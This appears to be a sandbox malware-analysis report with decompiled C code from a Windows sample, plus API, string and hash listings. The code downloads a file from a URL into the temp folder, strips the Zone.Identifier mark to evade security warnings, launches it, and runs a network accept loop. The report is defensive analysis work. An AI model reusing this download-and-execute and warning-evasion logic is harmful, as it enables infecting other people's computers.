                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                                                                                                                                                                                                  • Instruction ID: 20d6c97d6b695ed8f90c6196e572d057a4f116ce80d3111e68aa3d08335cc760
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 403510b0cf44a19509243faff8fda87969da86ef6f1582569b9df3b225e8f989
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6621CD72A002049FCB14EF66C8C1967B7A5FF48310B058979DD169B285D734F925CBE0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040D210(char* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				signed char _v1045;
                                                                                                                                                                                                                                                                  				short _v1572;
                                                                                                                                                                                                                                                                  				void* _v1576;
                                                                                                                                                                                                                                                                  				void* _v1580;
                                                                                                                                                                                                                                                                  				short _v2100;
                                                                                                                                                                                                                                                                  				void _v2364;
                                                                                                                                                                                                                                                                  				long _v2368;
                                                                                                                                                                                                                                                                  				long _v2372;
                                                                                                                                                                                                                                                                  				void* _v2376;
                                                                                                                                                                                                                                                                  				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                  				intOrPtr _v2384;
                                                                                                                                                                                                                                                                  				char _v2385;
                                                                                                                                                                                                                                                                  				intOrPtr _v2392;
                                                                                                                                                                                                                                                                  				signed int _t88;
                                                                                                                                                                                                                                                                  				signed int _t90;
                                                                                                                                                                                                                                                                  				int _t96;
                                                                                                                                                                                                                                                                  				signed int _t97;
                                                                                                                                                                                                                                                                  				signed int _t99;
                                                                                                                                                                                                                                                                  				signed int _t101;
                                                                                                                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                                                                                                                  				signed char _t125;
                                                                                                                                                                                                                                                                  				signed char _t127;
                                                                                                                                                                                                                                                                  				void* _t181;
                                                                                                                                                                                                                                                                  				void* _t182;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				srand(GetTickCount());
                                                                                                                                                                                                                                                                  				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                  				_v1045 = 0;
                                                                                                                                                                                                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                  				_v2380 = _a4;
                                                                                                                                                                                                                                                                  				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                  					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                  				_t88 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_t90 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                  					_v1576 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                  						_v1580 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0);
                                                                                                                                                                                                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							while(InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372) != 0 && _v2372 != 0) {
                                                                                                                                                                                                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  							DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  							Sleep(0x3e8);
                                                                                                                                                                                                                                                                  							_t125 = E0040CEF0( &_v1572);
                                                                                                                                                                                                                                                                  							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								Sleep(0x7d0);
                                                                                                                                                                                                                                                                  								_t127 = E0040D0B0( &_v1572);
                                                                                                                                                                                                                                                                  								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  										ExitProcess(0);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v1045 = 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if(_t96 == 0) {
                                                                                                                                                                                                                                                                  					_t97 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                  					_t99 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t101 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push( &_v1572);
                                                                                                                                                                                                                                                                  					_push( &_v1044);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					L0040E9D2();
                                                                                                                                                                                                                                                                  					if(_t96 == 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  						if((E0040CEF0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						Sleep(0x7d0);
                                                                                                                                                                                                                                                                  						_t111 = E0040D0B0( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  							return _t111;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t96;
                                                                                                                                                                                                                                                                  			}






























                                                                                                                                                                                                                                                                  0x0040d220
                                                                                                                                                                                                                                                                  0x0040d225
                                                                                                                                                                                                                                                                  0x0040d228
                                                                                                                                                                                                                                                                  0x0040d240
                                                                                                                                                                                                                                                                  0x0040d249
                                                                                                                                                                                                                                                                  0x0040d258
                                                                                                                                                                                                                                                                  0x0040d25e
                                                                                                                                                                                                                                                                  0x0040d266
                                                                                                                                                                                                                                                                  0x0040d26c
                                                                                                                                                                                                                                                                  0x0040d273
                                                                                                                                                                                                                                                                  0x0040d288
                                                                                                                                                                                                                                                                  0x0040d2a3
                                                                                                                                                                                                                                                                  0x0040d2ab
                                                                                                                                                                                                                                                                  0x0040d2b0
                                                                                                                                                                                                                                                                  0x0040d2bf
                                                                                                                                                                                                                                                                  0x0040d2c4
                                                                                                                                                                                                                                                                  0x0040d2e6
                                                                                                                                                                                                                                                                  0x0040d2ec
                                                                                                                                                                                                                                                                  0x0040d302
                                                                                                                                                                                                                                                                  0x0040d30f
                                                                                                                                                                                                                                                                  0x0040d331
                                                                                                                                                                                                                                                                  0x0040d33e
                                                                                                                                                                                                                                                                  0x0040d360
                                                                                                                                                                                                                                                                  0x0040d36d
                                                                                                                                                                                                                                                                  0x0040d373
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3cd
                                                                                                                                                                                                                                                                  0x0040d3e6
                                                                                                                                                                                                                                                                  0x0040d3f6
                                                                                                                                                                                                                                                                  0x0040d401
                                                                                                                                                                                                                                                                  0x0040d40e
                                                                                                                                                                                                                                                                  0x0040d413
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d460
                                                                                                                                                                                                                                                                  0x0040d41d
                                                                                                                                                                                                                                                                  0x0040d422
                                                                                                                                                                                                                                                                  0x0040d42f
                                                                                                                                                                                                                                                                  0x0040d434
                                                                                                                                                                                                                                                                  0x0040d43d
                                                                                                                                                                                                                                                                  0x0040d446
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d457
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d487
                                                                                                                                                                                                                                                                  0x0040d492
                                                                                                                                                                                                                                                                  0x0040d498
                                                                                                                                                                                                                                                                  0x0040d4a1
                                                                                                                                                                                                                                                                  0x0040d4a7
                                                                                                                                                                                                                                                                  0x0040d4ac
                                                                                                                                                                                                                                                                  0x0040d4be
                                                                                                                                                                                                                                                                  0x0040d4c4
                                                                                                                                                                                                                                                                  0x0040d4c9
                                                                                                                                                                                                                                                                  0x0040d4d8
                                                                                                                                                                                                                                                                  0x0040d4dd
                                                                                                                                                                                                                                                                  0x0040d4ff
                                                                                                                                                                                                                                                                  0x0040d508
                                                                                                                                                                                                                                                                  0x0040d50a
                                                                                                                                                                                                                                                                  0x0040d512
                                                                                                                                                                                                                                                                  0x0040d519
                                                                                                                                                                                                                                                                  0x0040d51a
                                                                                                                                                                                                                                                                  0x0040d51c
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d53c
                                                                                                                                                                                                                                                                  0x0040d54c
                                                                                                                                                                                                                                                                  0x0040d557
                                                                                                                                                                                                                                                                  0x0040d571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d5ae
                                                                                                                                                                                                                                                                  0x0040d578
                                                                                                                                                                                                                                                                  0x0040d58d
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d59d
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d5b7

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040D219
                                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 0040D220
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D240
                                                                                                                                                                                                                                                                  • mbstowcs.NTDLL ref: 0040D2A3
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2AB
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D2E6
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D2FC
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D32B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D35A
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D38D
                                                                                                                                                                                                                                                                  • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040D3BE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D3CD
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D3E6
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D3F6
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D44A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D422
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: CreateProcessW.KERNELBASE ref: 0040D105
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: Sleep.KERNELBASE(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D460
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D46D
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D47A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D487
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D492
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4A7
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0040D4BE
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4C4
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4D8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D4FF
                                                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D51C
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D53C
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D54C
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D557
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D401
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileMappingW.KERNEL32(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D578
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D59F
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D5AE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D4F3
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D3DA
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D530
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D2DA
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36, xrefs: 0040D2F7
                                                                                                                                                                                                                                                                  • %temp%, xrefs: 0040D23B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.263050024.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263037424.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263087804.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.263093386.0000000000412000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_l3Qj8QhTYZ.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Sleep$Internetrand$CloseCreateDeleteHandlewsprintf$Process$ExitOpen$CountDownloadEnvironmentExpandMappingReadSizeStringsTickViewWritembstowcsmemsetsrand
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 3135114409-2302825242
                                                                                                                                                                                                                                                                  • Opcode ID: 3828839049e72b9cbb3c4e22e02d6245aa4a8365f364771440cdcbb8f75ef58c
                                                                                                                                                                                                                                                                  • Instruction ID: ca6c14ff5b50aa8784996ad2499aaf2eb04ac4ca7c8f7d7d042f209e4fd4e3d1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3828839049e72b9cbb3c4e22e02d6245aa4a8365f364771440cdcbb8f75ef58c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4091D7B1901314ABEB30DB50CC45FAA7379AF88305F0085F9F609B51C2DA789A88CF69
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 353 40e120-40e147 GetTickCount WaitForSingleObject 354 40e2c9-40e2cf 353->354 355 40e14d-40e164 WSAWaitForMultipleEvents 353->355 356 40e1f0-40e203 GetTickCount 355->356 357 40e16a-40e181 WSAEnumNetworkEvents 355->357 358 40e243-40e24c GetTickCount 356->358 359 40e205-40e214 EnterCriticalSection 356->359 357->356 360 40e183-40e188 357->360 364 40e2b5-40e2c3 WaitForSingleObject 358->364 365 40e24e-40e25d EnterCriticalSection 358->365 361 40e216-40e21d 359->361 362 40e23a-40e241 LeaveCriticalSection 359->362 360->356 363 40e18a-40e190 360->363 366 40e235 call 40e020 361->366 367 40e21f-40e227 361->367 362->364 363->356 368 40e192-40e1b1 accept 363->368 364->354 364->355 369 40e2a1-40e2b1 LeaveCriticalSection GetTickCount 365->369 370 40e25f-40e277 InterlockedExchangeAdd call 40bb80 365->370 366->362 367->361 371 40e229-40e230 LeaveCriticalSection 367->371 368->356 373 40e1b3-40e1c2 call 40dcb0 368->373 369->364 377 40e297-40e29f 370->377 378 40e279-40e282 370->378 371->364 373->356 381 40e1c4-40e1df call 40df40 373->381 377->369 377->370 378->377 380 40e284-40e28d call 409320 378->380 380->377 381->356 386 40e1e1-40e1e7 381->386 386->356 387 40e1e9-40e1eb call 40e4f0 386->387 387->356
                                                                                                                                                                                                                                                                  C-Code - Quality: 82%
                                                                                                                                                                                                                                                                  			E0040E120(intOrPtr* _a4) {
                                                                                                                                                                                                                                                                  				intOrPtr _v64;
                                                                                                                                                                                                                                                                  				char _v68;
                                                                                                                                                                                                                                                                  				long _v72;
                                                                                                                                                                                                                                                                  				signed char _v80;
                                                                                                                                                                                                                                                                  				long _v92;
                                                                                                                                                                                                                                                                  				char _v96;
                                                                                                                                                                                                                                                                  				char _v100;
                                                                                                                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                                                                                                                  				void* __edi;
                                                                                                                                                                                                                                                                  				void* __ebp;
                                                                                                                                                                                                                                                                  				long _t31;
                                                                                                                                                                                                                                                                  				long _t33;
                                                                                                                                                                                                                                                                  				long _t34;
                                                                                                                                                                                                                                                                  				long _t42;
                                                                                                                                                                                                                                                                  				intOrPtr _t49;
                                                                                                                                                                                                                                                                  				intOrPtr* _t56;
                                                                                                                                                                                                                                                                  				intOrPtr _t70;
                                                                                                                                                                                                                                                                  				intOrPtr* _t73;
                                                                                                                                                                                                                                                                  				long _t74;
                                                                                                                                                                                                                                                                  				intOrPtr _t75;
                                                                                                                                                                                                                                                                  				struct _CRITICAL_SECTION* _t76;
                                                                                                                                                                                                                                                                  				intOrPtr* _t77;
                                                                                                                                                                                                                                                                  				void* _t78;
                                                                                                                                                                                                                                                                  				signed int _t79;
                                                                                                                                                                                                                                                                  				void* _t81;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t81 = (_t79 & 0xfffffff8) - 0x44;
                                                                                                                                                                                                                                                                  				_t31 = GetTickCount();
                                                                                                                                                                                                                                                                  				_t56 = _a4;
                                                                                                                                                                                                                                                                  				_v72 = _t31;
                                                                                                                                                                                                                                                                  				_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				if(_t33 == 0) {
                                                                                                                                                                                                                                                                  					L25:
                                                                                                                                                                                                                                                                  					return _t33;
                                                                                                                                                                                                                                                                  				} else {
                                                                                                                                                                                                                                                                  					goto L1;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					L1:
                                                                                                                                                                                                                                                                  					_t73 = _t56 + 0x18;
                                                                                                                                                                                                                                                                  					__imp__WSAWaitForMultipleEvents(1, _t73, 0, 0, 0);
                                                                                                                                                                                                                                                                  					if(_t33 != 0x102) {
                                                                                                                                                                                                                                                                  						__imp__WSAEnumNetworkEvents( *((intOrPtr*)(_t56 + 0x14)),  *_t73,  &_v68);
                                                                                                                                                                                                                                                                  						if((_v80 & 0x00000008) != 0 && _v64 == 0 &&  *_t56 == 0x494f4350) {
                                                                                                                                                                                                                                                                  							_t49 =  *((intOrPtr*)(_t56 + 0x14));
                                                                                                                                                                                                                                                                  							_v100 = 0x10;
                                                                                                                                                                                                                                                                  							__imp__#1(_t49,  &_v96,  &_v100);
                                                                                                                                                                                                                                                                  							if(_t49 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_t77 = E0040DCB0(_t56, _t49);
                                                                                                                                                                                                                                                                  								_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  								if(_t77 != 0) {
                                                                                                                                                                                                                                                                  									_t15 = _t77 + 0x264; // 0x264
                                                                                                                                                                                                                                                                  									E0040DF40(0, _t77, _t56, _t15);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 8;
                                                                                                                                                                                                                                                                  									if( *((char*)(_t77 + 0x274)) == 0 &&  *_t77 == 0x69636c69) {
                                                                                                                                                                                                                                                                  										E0040E4F0(_t77);
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t34 = GetTickCount();
                                                                                                                                                                                                                                                                  					_t74 = _v92;
                                                                                                                                                                                                                                                                  					if(_t34 - _t74 < 0x3e8) {
                                                                                                                                                                                                                                                                  						if(GetTickCount() - _t74 < 0x2710) {
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						EnterCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  						_t75 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  						if(_t75 == 0) {
                                                                                                                                                                                                                                                                  							L23:
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t56 + 0x20);
                                                                                                                                                                                                                                                                  							_v92 = GetTickCount();
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							goto L19;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						do {
                                                                                                                                                                                                                                                                  							L19:
                                                                                                                                                                                                                                                                  							_t42 = InterlockedExchangeAdd(_t75 + 4, 0);
                                                                                                                                                                                                                                                                  							if(E0040BB80() - _t42 >= 0x1e) {
                                                                                                                                                                                                                                                                  								_t45 =  *((intOrPtr*)(_t75 + 0x260));
                                                                                                                                                                                                                                                                  								if( *((intOrPtr*)(_t75 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  									E00409320(_t45);
                                                                                                                                                                                                                                                                  									_t81 = _t81 + 4;
                                                                                                                                                                                                                                                                  									 *((intOrPtr*)(_t75 + 0x260)) = 0xffffffff;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							_t75 =  *((intOrPtr*)(_t75 + 0x280));
                                                                                                                                                                                                                                                                  						} while (_t75 != 0);
                                                                                                                                                                                                                                                                  						goto L23;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t76 = _t56 + 0x20;
                                                                                                                                                                                                                                                                  					EnterCriticalSection(_t76);
                                                                                                                                                                                                                                                                  					_t70 =  *((intOrPtr*)(_t56 + 0x38));
                                                                                                                                                                                                                                                                  					if(_t70 == 0) {
                                                                                                                                                                                                                                                                  						L16:
                                                                                                                                                                                                                                                                  						LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  						goto L24;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					while( *((intOrPtr*)(_t70 + 0x260)) != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_t70 =  *((intOrPtr*)(_t70 + 0x280));
                                                                                                                                                                                                                                                                  						if(_t70 != 0) {
                                                                                                                                                                                                                                                                  							continue;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							LeaveCriticalSection(_t76);
                                                                                                                                                                                                                                                                  							goto L24;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					E0040E020(_t56, _t70, _t78);
                                                                                                                                                                                                                                                                  					goto L16;
                                                                                                                                                                                                                                                                  					L24:
                                                                                                                                                                                                                                                                  					_t33 = WaitForSingleObject( *(_t56 + 0x10), 1);
                                                                                                                                                                                                                                                                  				} while (_t33 != 0);
                                                                                                                                                                                                                                                                  				goto L25;
                                                                                                                                                                                                                                                                  			}




























                                                                                                                                                                                                                                                                  0x0040e126
                                                                                                                                                                                                                                                                  0x0040e12c
                                                                                                                                                                                                                                                                  0x0040e132
                                                                                                                                                                                                                                                                  0x0040e135
                                                                                                                                                                                                                                                                  0x0040e13f
                                                                                                                                                                                                                                                                  0x0040e147
                                                                                                                                                                                                                                                                  0x0040e2c9
                                                                                                                                                                                                                                                                  0x0040e2cf
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e14d
                                                                                                                                                                                                                                                                  0x0040e153
                                                                                                                                                                                                                                                                  0x0040e159
                                                                                                                                                                                                                                                                  0x0040e164
                                                                                                                                                                                                                                                                  0x0040e176
                                                                                                                                                                                                                                                                  0x0040e181
                                                                                                                                                                                                                                                                  0x0040e192
                                                                                                                                                                                                                                                                  0x0040e1a0
                                                                                                                                                                                                                                                                  0x0040e1a8
                                                                                                                                                                                                                                                                  0x0040e1b1
                                                                                                                                                                                                                                                                  0x0040e1bb
                                                                                                                                                                                                                                                                  0x0040e1bd
                                                                                                                                                                                                                                                                  0x0040e1c2
                                                                                                                                                                                                                                                                  0x0040e1c4
